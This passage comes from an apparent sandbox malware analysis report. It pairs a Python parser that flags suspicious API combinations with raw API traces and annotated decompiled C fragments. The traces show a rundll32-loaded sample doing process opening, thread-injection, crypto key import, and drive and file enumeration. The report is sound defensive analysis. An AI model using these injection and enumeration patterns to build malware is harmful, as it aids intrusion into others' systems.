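    "resumes a thread": {"ResumeThread"},
}


def flag_patterns(refs: List[ApiRef]) -> List[str]:
    """Return the labels of every pattern whose API set is fully present."""
    names = {r.api for r in refs}
    return sorted(label for label, need in PATTERNS.items() if need <= names)


# Sample input: the two API listings copied from the records above.
SAMPLE_RESUME = """\
  • Part of subcall function 04F671B4: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,04F8A170,00000000,04F75D81,?,04F6F2F7,?), ref: 04F671D3
  • Part of subcall function 04F671B4: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,04F8A170,00000000,04F75D81,?,04F6F2F7,?), ref: 04F671DE
  • Part of subcall function 04F671B4: _wcsupr.NTDLL ref: 04F671EB
  • Part of subcall function 04F671B4: lstrlenW.KERNEL32(00000000), ref: 04F671F3
• ResumeThread.KERNEL32(00000004,?,04F6F2F7,?), ref: 04F75D8F
"""

SAMPLE_TOOLHELP = """\
  • Part of subcall function 04F81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F02
  • Part of subcall function 04F81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 04F81F16
  • Part of subcall function 04F81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F30
  • Part of subcall function 04F81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,04F62C89,?,?,?), ref: 04F81F5A
• HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 04F67100
  • Part of subcall function 04F64963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,04F670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 04F64975
  • Part of subcall function 04F64963: StrChrA.SHLWAPI(?,00000020,?,00000000,04F670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 04F64984
  • Part of subcall function 04F6EE04: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 04F6EE2A
  • Part of subcall function 04F6EE04: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 04F6EE36
  • Part of subcall function 04F6EE04: GetModuleHandleA.KERNEL32(?,0631978E,00000000,?,00000000), ref: 04F6EE56
  • Part of subcall function 04F6EE04: GetProcAddress.KERNEL32(00000000), ref: 04F6EE5D
  • Part of subcall function 04F6EE04: Thread32First.KERNEL32(?,0000001C), ref: 04F6EE6D
  • Part of subcall function 04F6EE04: CloseHandle.KERNEL32(?), ref: 04F6EEB5
"""

if __name__ == "__main__":
    for sample in (SAMPLE_RESUME, SAMPLE_TOOLHELP):
        refs = parse_api_lines(sample)
        print(api_id(refs), flag_patterns(refs))
```

Run as a script it prints the rebuilt API ID for both samples, which should match the two keys quoted above; that equality is the check that the inferred rule holds for these records. The subcall addresses kept in `subcall_of` (04F671B4, 04F6EE04, ...) are what lets the references be grouped by callee when reading a report in bulk, and the flagged combinations (Toolhelp thread enumeration, GetModuleHandleA plus GetProcAddress, image-name lookup next to ResumeThread) are the API-level evidence behind the thread-injection and dynamic-API signatures listed for this sample.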

                            APIs
                              • Part of subcall function 04F81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F02
                              • Part of subcall function 04F81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 04F81F16
                              • Part of subcall function 04F81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F30
                              • Part of subcall function 04F81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,04F62C89,?,?,?), ref: 04F81F5A
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,04F704AC,04F7C384,00000000,00000000), ref: 04F815F0
                              • Part of subcall function 04F64963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,04F670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 04F64975
                              • Part of subcall function 04F64963: StrChrA.SHLWAPI(?,00000020,?,00000000,04F670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 04F64984
                              • Part of subcall function 04F63172: lstrlen.KERNEL32(04F643C6,00000000,?,?,?,?,04F643C6,00000035,00000000,?,00000000), ref: 04F631A2
                              • Part of subcall function 04F63172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04F631B8
                              • Part of subcall function 04F63172: memcpy.NTDLL(00000010,04F643C6,00000000,?,?,04F643C6,00000035,00000000), ref: 04F631EE
                              • Part of subcall function 04F63172: memcpy.NTDLL(00000010,00000000,00000035,?,?,04F643C6,00000035), ref: 04F63209
                              • Part of subcall function 04F63172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 04F63227
                              • Part of subcall function 04F63172: GetLastError.KERNEL32(?,?,04F643C6,00000035), ref: 04F63231
                              • Part of subcall function 04F63172: HeapFree.KERNEL32(00000000,00000000,?,?,04F643C6,00000035), ref: 04F63254
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                            • String ID:
                            • API String ID: 730886825-0
                            • Opcode ID: fdf2544cf5d8e3ca40498a6d1d9d70220775ef1147a4e087f2a9ba623d60c4f4
                            • Instruction ID: e1437b08c5fa5e9e3f550f2e2a29c220a1974baba07b429f483448934b6a8f53
                            • Opcode Fuzzy Hash: fdf2544cf5d8e3ca40498a6d1d9d70220775ef1147a4e087f2a9ba623d60c4f4
                            • Instruction Fuzzy Hash: 41011271910204BBEB11EB95ED45FAE77ECDF45754F100159B501AE140DB74BE06DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • memset.NTDLL ref: 04F74855
                              • Part of subcall function 04F7A451: memset.NTDLL ref: 04F7A477
                              • Part of subcall function 04F7A451: memcpy.NTDLL ref: 04F7A49F
                              • Part of subcall function 04F7A451: GetLastError.KERNEL32(00000010,00000218,04F8386D,00000100,?,00000318,00000008), ref: 04F7A4B6
                              • Part of subcall function 04F7A451: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,04F8386D,00000100), ref: 04F7A599
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastmemset$AllocateHeapmemcpy
                            • String ID:
                            • API String ID: 4290293647-0
                            • Opcode ID: b830e6e4ca33bbd16fb0f49671e58ee5d3fb618611dc5768a96a6b5296d5d414
                            • Instruction ID: 37d341a789b39c1af837bc1edcdb2798d53bdfa4fbecae18f5b56b5513c43492
                            • Opcode Fuzzy Hash: b830e6e4ca33bbd16fb0f49671e58ee5d3fb618611dc5768a96a6b5296d5d414
                            • Instruction Fuzzy Hash: 4701FD719017586BE7219E28DC48F9B3BE8AB44318F04842BF8488A290D37DE9168AA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A1155C(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                            				void* _t21;
                            				void* _t22;
                            				signed int _t24;
                            				intOrPtr* _t26;
                            				void* _t27;
                            
                            				_t26 = __edi;
                            				if(_a4 == 0) {
                            					L2:
                            					// 0x80000002 is HKEY_LOCAL_MACHINE: E04A112CA is asked for a value under
                            					// HKLM and returns a heap buffer through &_a4 and its byte length through &_a12.
                            					_t27 = E04A112CA(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                            					if(_t27 == 0) {
                            						// Byte length to UTF-16 character count.
                            						_t24 = _a12 >> 1;
                            						if(_t24 == 0) {
                            							// Empty value: release the buffer and report status 2.
                            							_t27 = 2;
                            							HeapFree( *0x4a1a2d8, 0, _a4);
                            						} else {
                            							// Force a terminating NUL into the last wide character and hand
                            							// the buffer back to the caller through __edi.
                            							_t21 = _a4;
                            							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                            							 *_t26 = _t21;
                            						}
                            					}
                            					L6:
                            					return _t27;
                            				}
                            				// Non-null _a4: E04A11B6F is tried first (its subcall frees a BSTR, see the
                            				// SysFreeString reference below); only if it fails does the HKLM path at L2 run.
                            				_t22 = E04A11B6F(_a4, _a8, _a12, __edi); // executed
                            				_t27 = _t22;
                            				if(_t27 == 0) {
                            					goto L6;
                            				}
                            				goto L2;
                            			}

                            APIs
                              • Part of subcall function 04A11B6F: SysFreeString.OLEAUT32(00000000), ref: 04A11BD2
                            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7620F710,?,00000000,?,00000000,?,04A121A9,?,004F0053,05539400,00000000,?), ref: 04A115BF
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Free$HeapString
                            • String ID:
                            • API String ID: 3806048269-0
                            • Opcode ID: 4832f39964da2d6b18570ada3ffc68cc2921ff63077b1828a28a7f09d1cda338
                            • Instruction ID: 011db6281df5086fc5ea01a5364dc697436785f264da4515ecee48d1bef20b85
                            • Opcode Fuzzy Hash: 4832f39964da2d6b18570ada3ffc68cc2921ff63077b1828a28a7f09d1cda338
                            • Instruction Fuzzy Hash: B5014F32100619BBDB229F94CC01FEA3BA9EF1C7A0F448424FF069A130D731E961DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E04A124B3(void* __ecx, void* __edx, void* _a4, void* _a8) {
                            				void* _t13;
                            				void* _t21;
                            
                            				_t11 =  &_a4;
                            				_t21 = 0;
                            				__imp__( &_a8);
                            				_t13 = E04A15FBB( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                            				if(_t13 == 0) {
                            					_t21 = E04A16D63(_a8 + _a8);
                            					if(_t21 != 0) {
                            						E04A1298F(_a4, _t21, _t23);
                            					}
                            					E04A16C2C(_a4);
                            				}
                            				return _t21;
                            			}

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,04A158D7,00000000,?,04A11D97,00000000,04A158D7,?,746BC740,04A158D7,00000000,055395B0), ref: 04A124C4
                              • Part of subcall function 04A15FBB: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,04A124D8,00000001,04A158D7,00000000), ref: 04A15FF3
                              • Part of subcall function 04A15FBB: memcpy.NTDLL(04A124D8,04A158D7,00000010,?,?,?,04A124D8,00000001,04A158D7,00000000,?,04A11D97,00000000,04A158D7,?,746BC740), ref: 04A1600C
                              • Part of subcall function 04A15FBB: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 04A16035
                              • Part of subcall function 04A15FBB: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04A1604D
                              • Part of subcall function 04A15FBB: memcpy.NTDLL(00000000,746BC740,055395B0,00000010), ref: 04A1609F
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                            • String ID:
                            • API String ID: 894908221-0
                            • Opcode ID: 240399a2ef63c10b17167aa497efe6e31b730df1dff9e3415d0b7a861153672b
                            • Instruction ID: af8c204a9a92a8e586cf5c9c54602e1865d815fa91b150417cce53a65afd1cad
                            • Opcode Fuzzy Hash: 240399a2ef63c10b17167aa497efe6e31b730df1dff9e3415d0b7a861153672b
                            • Instruction Fuzzy Hash: 71F03A7B100109BBDF116F59DD40DEB7BADEF847A4B018022FD09DA020DA31EA559BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A174B6(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
                            				void* _t17;
                            
                            				if(_a4 == 0) {
                            					L2:
                            					return E04A123D9(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                            				}
                            				_t17 = E04A114F1(_a4, _a8, _a12, _a16, _a20); // executed
                            				if(_t17 != 0) {
                            					goto L2;
                            				}
                            				return _t17;
                            			}


                            APIs
                            • lstrlenW.KERNEL32(?,?,?,04A1363B,3D04A190,80000002,04A17168,04A17283,74666F53,4D4C4B48,04A17283,?,3D04A190,80000002,04A17168,?), ref: 04A174DB
                              • Part of subcall function 04A114F1: SysAllocString.OLEAUT32(04A17283), ref: 04A1150A
                              • Part of subcall function 04A114F1: SysFreeString.OLEAUT32(00000000), ref: 04A1154B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: String$AllocFreelstrlen
                            • String ID:
                            • API String ID: 3808004451-0
                            • Opcode ID: 976a01818864cb983cccc36a924a8971dceef1565a99b5f7f501af9f970d5f46
                            • Instruction ID: 8abc00574670d80801790f78a8c652e0ee1577839c61e75d3d11ba3c4ac9a42d
                            • Opcode Fuzzy Hash: 976a01818864cb983cccc36a924a8971dceef1565a99b5f7f501af9f970d5f46
                            • Instruction Fuzzy Hash: 61F0923600010EBFEF029F90ED05EEA3F6AEB18754F048014BA0458171D772D5B1EBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A12B23(void* __edi, void* _a4) {
                            				int _t7;
                            				int _t12;
                            
                            				_t7 = E04A12575(__edi, _a4,  &_a4); // executed
                            				_t12 = _t7;
                            				if(_t12 != 0) {
                            					memcpy(__edi, _a4, _t12);
                            					 *((char*)(__edi + _t12)) = 0;
                            					E04A16C2C(_a4);
                            				}
                            				return _t12;
                            			}

                            APIs
                              • Part of subcall function 04A12575: memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,04A14493,?), ref: 04A125AB
                              • Part of subcall function 04A12575: memset.NTDLL ref: 04A12621
                              • Part of subcall function 04A12575: memset.NTDLL ref: 04A12635
                            • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,04A14493,?,?,?,?), ref: 04A12B3F
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: memcpymemset$FreeHeap
                            • String ID:
                            • API String ID: 3053036209-0
                            • Opcode ID: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                            • Instruction ID: 53959d7b95a5a0620cf05f0a976a384d1cf9f95b4913a0b683100a161fe1a6ef
                            • Opcode Fuzzy Hash: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                            • Instruction Fuzzy Hash: 60E08C7740112877EB122E94EC00EEB7F5CDF556E5F004024FE089A220D632E61097E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memset.NTDLL ref: 04F673F5
                              • Part of subcall function 04F66261: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 04F662A8
                              • Part of subcall function 04F66261: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 04F662BE
                              • Part of subcall function 04F66261: RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 04F66307
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Open$Closememset
                            • String ID:
                            • API String ID: 1685373161-0
                            • Opcode ID: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                            • Instruction ID: f5ab505ce883105e0626a98e0a057fe724b2dfbaab1c022b9c0606a020a55ce9
                            • Opcode Fuzzy Hash: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                            • Instruction Fuzzy Hash: 92E01234240118B7FB10BE54DC55F997B54EF04758F008015BE09AE241DE72F6A1D791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,04F860E0,0000002C,04F790D3,06318E36,?,00000000,04F7A484,?,00000318), ref: 04F81EB7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeVirtual
                            • String ID:
                            • API String ID: 1263568516-0
                            • Opcode ID: 61a5fbde864181eab00533d4f779b8546d5981d9f904aede7472e7e6899c5e5b
                            • Instruction ID: 0cf25a8543624c174992e0cf454f0f4a1cba434b5dc1a0fe1f221ecf4a90addd
                            • Opcode Fuzzy Hash: 61a5fbde864181eab00533d4f779b8546d5981d9f904aede7472e7e6899c5e5b
                            • Instruction Fuzzy Hash: 97D01731E00219EBCB20AF94DC4999EFB70BF08720F608228E8607B1A0C7342D16CF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                              • Part of subcall function 04F721B6: ExpandEnvironmentStringsW.KERNEL32(04F6AEB5,00000000,00000000,00000001,00000000,00000000,04F6E448,04F6AEB5,00000000,04F6E448,?), ref: 04F721CD
                              • Part of subcall function 04F721B6: ExpandEnvironmentStringsW.KERNEL32(04F6AEB5,00000000,00000000,00000000), ref: 04F721E7
                            • lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 04F7BB1D
                            • lstrlenW.KERNEL32(?,?,00000000), ref: 04F7BB29
                            • memset.NTDLL ref: 04F7BB71
                            • FindFirstFileW.KERNEL32(00000000,00000000), ref: 04F7BB8C
                            • lstrlenW.KERNEL32(0000002C), ref: 04F7BBC4
                            • lstrlenW.KERNEL32(?), ref: 04F7BBCC
                            • memset.NTDLL ref: 04F7BBEF
                            • wcscpy.NTDLL ref: 04F7BC01
                            • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04F7BC27
                            • RtlEnterCriticalSection.NTDLL(?), ref: 04F7BC5D
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04F7BC79
                            • FindNextFileW.KERNEL32(?,00000000), ref: 04F7BC92
                            • WaitForSingleObject.KERNEL32(00000000), ref: 04F7BCA4
                            • FindClose.KERNEL32(?), ref: 04F7BCB9
                            • FindFirstFileW.KERNEL32(00000000,00000000), ref: 04F7BCCD
                            • lstrlenW.KERNEL32(0000002C), ref: 04F7BCEF
                            • FindNextFileW.KERNEL32(?,00000000), ref: 04F7BD65
                            • WaitForSingleObject.KERNEL32(00000000), ref: 04F7BD77
                            • FindClose.KERNEL32(?), ref: 04F7BD92
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                            • String ID:
                            • API String ID: 2962561936-0
                            • Opcode ID: 06649ca3ee3394802842a486b4d04344d635a9bd8ba5f0e3b2eba2af20ff43b0
                            • Instruction ID: 73699c698bd859cd8ddf203f316ef4be8b4ee3b0322e2a7dd0a74744f9e128ed
                            • Opcode Fuzzy Hash: 06649ca3ee3394802842a486b4d04344d635a9bd8ba5f0e3b2eba2af20ff43b0
                            • Instruction Fuzzy Hash: 8A815C71904349AFD711AF64DC84A2BBBE8FF89308F04881EF99596151DB78F806CF52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B270
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B2A2
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B2D4
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B306
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B338
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B36A
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B39C
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B3CE
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,7620F710,00000000,00000000), ref: 04F6B400
                            • HeapFree.KERNEL32(00000000,?,?,?,?,7620F710,00000000,00000000), ref: 04F6B593
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,?,?,?,7620F710,00000000,00000000), ref: 04F6B637
                              • Part of subcall function 04F77736: RtlAllocateHeap.NTDLL ref: 04F77777
                              • Part of subcall function 04F77736: memset.NTDLL ref: 04F7778B
                              • Part of subcall function 04F77736: GetCurrentThreadId.KERNEL32 ref: 04F77818
                              • Part of subcall function 04F77736: GetCurrentThread.KERNEL32 ref: 04F7782B
                              • Part of subcall function 04F66537: RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F66540
                              • Part of subcall function 04F66537: HeapFree.KERNEL32(00000000,?), ref: 04F66572
                              • Part of subcall function 04F66537: RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F66590
                            • HeapFree.KERNEL32(00000000,?,?,?,?,7620F710,00000000,00000000), ref: 04F6B5DF
                              • Part of subcall function 04F6D4DA: lstrlen.KERNEL32(?,00000000,761B6980,00000000,04F6DA7B,?), ref: 04F6D4E3
                              • Part of subcall function 04F6D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 04F6D506
                              • Part of subcall function 04F6D4DA: memset.NTDLL ref: 04F6D515
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$CriticalCurrentSectionThreadmemset$AllocateEnterLeavelstrlenmemcpy
                            • String ID:
                            • API String ID: 3296958911-0
                            • Opcode ID: 6467d56c73859db1bbdaa86c0436a266d88d01349db43308e65e0df59dceae26
                            • Instruction ID: 04540cfceef2c47400e4daa7b72529390f96701594443fcbc575448a2f919dfa
                            • Opcode Fuzzy Hash: 6467d56c73859db1bbdaa86c0436a266d88d01349db43308e65e0df59dceae26
                            • Instruction Fuzzy Hash: ADF163B2F10529ABDB10FF74EC84D7F33E9DB08644715496AA902DB204EA38FD439B65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 04F610FA
                            • GetLastError.KERNEL32 ref: 04F61108
                            • NtSetInformationProcess.NTDLL ref: 04F61162
                            • GetProcAddress.KERNEL32(?,00000000), ref: 04F611A1
                            • GetProcAddress.KERNEL32(?), ref: 04F611C2
                            • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 04F61219
                            • CloseHandle.KERNEL32(?), ref: 04F6122F
                            • CloseHandle.KERNEL32(?), ref: 04F61255
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                            • String ID:
                            • API String ID: 3529370251-0
                            • Opcode ID: f9207cf075c74cbd8bca648fe3ad6010e180d6ec832f94ddb7a20e4071292c53
                            • Instruction ID: b0313d941f3b2e883c08d652df62269fff379fa02b48b7ee3782be5e999b519d
                            • Opcode Fuzzy Hash: f9207cf075c74cbd8bca648fe3ad6010e180d6ec832f94ddb7a20e4071292c53
                            • Instruction Fuzzy Hash: AB416C71904349AFD7119F64ED48A2ABBF8FB88308F004A2EF556D6110D774EA4ACB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • wcscpy.NTDLL ref: 04F6FD7B
                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 04F6FD87
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F6FD98
                            • memset.NTDLL ref: 04F6FDB5
                            • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 04F6FDC3
                            • WaitForSingleObject.KERNEL32(00000000), ref: 04F6FDD1
                            • GetDriveTypeW.KERNEL32(?), ref: 04F6FDDF
                            • lstrlenW.KERNEL32(?), ref: 04F6FDEB
                            • wcscpy.NTDLL ref: 04F6FDFD
                            • lstrlenW.KERNEL32(?), ref: 04F6FE17
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6FE30
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                            • String ID:
                            • API String ID: 3888849384-0
                            • Opcode ID: 9c1eed9129bbfa59f557cc055afeb5fd479771a98f925e480f6c6ea6772654d6
                            • Instruction ID: e506fcaad9c588920d547b61bb5cc21d331d98009fa8298bb82de16593d27b89
                            • Opcode Fuzzy Hash: 9c1eed9129bbfa59f557cc055afeb5fd479771a98f925e480f6c6ea6772654d6
                            • Instruction Fuzzy Hash: A0312D76C0010DFFDB119FA4EC84CEEBBBDEB09358B10446AF501EA111E739AE559B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlenW.KERNEL32(?,00000000), ref: 04F699D4
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 04F69A3D
                            • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 04F69A65
